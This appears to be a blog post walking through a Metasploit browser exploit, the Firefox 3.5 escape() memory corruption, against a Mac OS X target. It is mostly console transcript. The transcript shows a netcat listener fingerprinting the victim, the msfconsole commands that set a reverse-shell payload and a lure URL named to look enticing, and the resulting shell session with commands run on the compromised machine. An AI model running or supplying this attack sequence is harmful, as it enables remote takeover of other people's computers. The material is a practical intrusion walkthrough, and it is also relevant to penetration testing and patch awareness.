The exploit that was covered recently in an earlier blog post on the Firefox 3.5 escape () value memory corruption exploit that worked against Windows XP, this exploit has now been expanded to now cover OSX 10.5.7 and it has been improved so no script problem message is shown to the user requiring interaction by him. For use against an OSX target the attack might look something like this:
carlos@loki:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos:
listening on [any] 80 ...connect to [192.168.1.158] from carlos-perezs-computer.local [192.168.1.120] 58924GET / HTTP/1.1Host: 192.168.1.158User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-alive^C sent 0, rcvd 370
Here the target was trick initially to connect to a Netcat listener so we could look at the User Agent string to identify the target OS and Browser, this could have been also easily done creating a fake webpage and having the victim connect and look at the logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit, payload and setting the proper target:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole__. .__. .__. __._____ _____/ |______ ____________ | | ____ |__|/ |_/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || ||__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|\/ \/ \/ \/ |__|=[ msf v3.3-dev+ -- --=[ 384 exploits - 261 payloads+ -- --=[ 20 encoders - 7 nops=[ 166 auxmsf > use exploit/multi/browser/firefox_escape_retvalmsf exploit(firefox_escape_retval) > show targetsExploit targets:Id Name-- ----0 Firefox 3.5.0 on Windows XP SP0-SP31 Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)msf exploit(firefox_escape_retval) > set TARGET 1TARGET => 1msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcpPAYLOAD => osx/x86/vforkshell_reverse_tcpmsf exploit(firefox_escape_retval) > set LHOST 192.168.1.158LHOST => 192.168.1.158
As it can be seen the payload selected was the vforkshell and one of the main advantages of this shell is that since it uses the vfork() Unix call to spawn it self it does not run under the process exploited so when the target kills the hanged browser we do not loose our shell access. Since we launched the exploit as root we can change the port to listen for the exploit to port 80 making it easier to exploit a target behind a Proxy or Firewall, change the URI path to one less suspicious and launch the exploit:
msf exploit(firefox_escape_retval) > set SRVPORT 80SRVPORT => 80msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.htmlURIPATH => secretdocumets.htmlmsf exploit(firefox_escape_retval) > exploit[*] Exploit running as background job.msf exploit(firefox_escape_retval) >[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/secretdocumets.html[*] Local IP: http://192.168.1.158:80/secretdocumets.html[*] Server started.
Once the targets connects to our exploit it will launch the exploit javascript code with the payload:
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.120:52760...[*] Command shell session 1 opened (192.168.1.158:4444 -> 192.168.1.120:52770)
Once the shell is created we can interact with it, one important thing to remember is that environment variables set for the shell are the ones for the process exploited so we will have to use full path when calling certain commands:
msf exploit(firefox_escape_retval) > sessions -lActive sessions===============Id Description Tunnel-- ----------- ------1 Command shell 192.168.1.158:4444 -> 192.168.1.120:52770msf exploit(firefox_escape_retval) > sessions -i 1[*] Starting interaction with 1...iduid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)uname -aDarwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386envPWD=/sbinSHLVL=1_=/usr/bin/envOLDPWD=/bin/sbin/ifconfiglo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1inet 127.0.0.1 netmask 0xff000000inet6 ::1 prefixlen 128gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280stf0: flags=0<> mtu 1280en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500ether 00:16:cb:9f:9e:11media: autoselect status: inactivesupported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> nonefw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030lladdr 00:17:f2:ff:fe:71:a7:b4media: autoselect <full-duplex> status: inactivesupported media: autoselect <full-duplex>en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6inet 192.168.1.120 netmask 0xffffff00 broadcast 192.168.1.255ether 00:17:f2:99:d7:cfmedia: autoselect status: activesupported media: autoselecten4: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500ether 00:16:cb:33:3e:50media: autoselect status: inactivesupported media: none autoselect 10baseT/UTP <half-duplex>vmnet8: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500inet 192.168.187.1 netmask 0xffffff00 broadcast 192.168.187.255ether 00:50:56:c0:00:08vmnet1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500inet 192.168.38.1 netmask 0xffffff00 broadcast 192.168.38.255ether 00:50:56:c0:00:01exit
[*] Command shell session 1 closed.
This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.